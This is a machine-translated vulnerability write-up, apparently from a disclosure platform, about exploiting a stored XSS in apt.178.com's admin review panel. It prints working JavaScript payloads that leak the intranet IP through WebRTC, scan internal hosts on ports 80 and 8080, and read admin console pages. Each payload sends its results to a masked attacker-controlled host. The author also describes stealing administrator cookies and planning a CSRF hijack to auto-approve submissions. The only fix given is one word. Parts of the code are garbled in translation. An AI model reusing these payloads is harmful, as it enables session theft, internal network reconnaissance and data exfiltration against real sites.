Test 178 Intranet through a storage XSS

Test 178 Intranet through a storage XSS

Test the 178 Intranet attachment payload through a storage XSS

Site: http://apt.178.com/

The input is not filtered when an app or ringtone resource is added.

As follows:
 

After the upload, it will be displayed on the front-end only after the Administrator reviews it.

Then you can manage it blindly.

I'm so excited that I have successfully received cookies and other information.
 

However, restrictions are imposed on the background.
 

Okay. In this way, the end is always not very good.

Then I want to use xss to do something else ..

First, obtain the Intranet ip address.

I learned from the payload of 0x_jin cattle, and then changed it locally and put it on a slag xss platform. The payload that the xss platform can use is

Benefits:

Var RTCPeerConnection = window. webkitRTCPeerConnection | window. Reset RTCPeerConnection;

if (RTCPeerConnection)(function() {    var rtc = new RTCPeerConnection({        iceServers: []    });    if (window.mozRTCPeerConnection) {        rtc.createDataChannel('', {            reliable: false        });    };    rtc.onicecandidate = function(evt) {        if (evt.candidate) grepSDP(evt.candidate.candidate);    };    rtc.createOffer(function(offerDesc) {        grepSDP(offerDesc.sdp);        rtc.setLocalDescription(offerDesc);    }, function(e) {        console.warn("offer failed", e);    });    var addrs = Object.create(null);    addrs["0.0.0.0"] = false;    function updateDisplay(newAddr) {        if (newAddr in addrs) return;        else addrs[newAddr] = true;        var displayAddrs = Object.keys(addrs).filter(function(k) {            return addrs[k];        });        var address = displayAddrs.join(" or perhaps ") || "n/a";        sendip(address);    }    function grepSDP(sdp) {        var hosts = [];        sdp.split('\r\n').forEach(function(line) {            if (~line.indexOf("a=candidate")) {                var parts = line.split(' '),                    addr = parts[4],                    type = parts[7];                if (type === 'host') updateDisplay(addr);            } else if (~line.indexOf("c=")) {                var parts = line.split(' '),                    addr = parts[2];                updateDisplay(addr);            }        });    }})();function sendip(ipaddress) {    alert(ipaddress);    var url = "http://*****.com/index.php?do=api&id={projectId}&address=" + ipaddress;    var xmlhttp1 = new XMLHttpRequest();    xmlhttp1.open("GET", url, true);    xmlhttp1.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");    xmlhttp1.send(null);}

Then, the Intranet ip information is obtained successfully.

Current ip Address: 192.168.1.111

Then I want to detect the active hosts in this Intranet segment. Tested locally. If you obtain 1 ~ In 255, the browser gets stuck. Detect 110 ~ Between 130.

Payload:

Function ipsend (ip, netport) {var ipdata = ip + ":" + netport; var url = "http: // ***** .sinaapp.com/insert.php? Ip = "+ ipdata; var xmlhttp1 = new XMLHttpRequest (); xmlhttp1.open (" GET ", url, true); xmlhttp1.send (null);} function ipCreate (ip) {var ips = ip. replace (/(\ d + \. \ d + \. \ d + )\. \ d +/, '$1. '); for (var I = 100; I <= 130; I ++) {// detect 110 ~ Between 130 ElementCreate (ips + I, "80", I); ElementCreate (ips + I, "8080", I) ;}} function ElementCreate (ip, xport, I) {var url = "http: //" + ip + ":" + xport; var scriptElement = document. createElement ("script"); scriptElement. src = url; scriptElement. setAttribute ("onload", "ipsend (\ '" + ip + "\', \ '" + xport + "\')"); document. body. appendChild (scriptElement);} ipCreate ("192.168.1.100 ");

I sent the obtained Intranet ip address and port to my Sina cloud sae.


 

After that, it seems that there is no development information in the Intranet, and it seems that it is only responsible for background review.





Since the Intranet is not easy to follow, in order to respond to the call of Big clouds. Http://zone.wooyun.org/content/18421



So consider another method. You can use xss to obtain the source code information on the review page, and then extract the approved request link. Then, after xss is used to hijack the administrator of csrf, when the Administrator opens the review page, the system automatically initiates a request so that the application I submitted will pass through automatically, so as to expand the impact by crawling to the front-end.

Start

Obtain the source code of http://apt.178.com/console/deb

Payload
 

Connection("console/deb");function Connection(url) {    var xmlhttp = new XMLHttpRequest();    xmlhttp.onreadystatechange = function() {        DataSend('a', 'filename getresponse code is : ' + encodeURIComponent(xmlhttp.status));        if (xmlhttp.readyState == 4 && xmlhttp.status == 200) {            DataSend(encodeURIComponent(url), encodeURIComponent(xmlhttp.responseText));        }    }    xmlhttp.open("GET", url, true);    xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");    xmlhttp.send();}function DataSend(fileurl, FileData) {    var url = "http://*****.sinaapp.com/insert.php?ip=" + FileData;    var xmlhttp1 = new XMLHttpRequest();    xmlhttp1.open("POST", url, true);    xmlhttp1.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");    xmlhttp1.send("ip=" + FileData);}

The obtained information is the same as that automatically requested by my server http: // ***** .sinaapp.com/insert.php for storage.

When sending two requests in js, the http status code is first stored, followed by the content


 

200. Request successful


But the strange thing is that although the status code comes, the content does not come. This makes me confused. The server database does not exist either.


Delay for a long time, and then check the source code in the server log


 

 

Solution:

Filter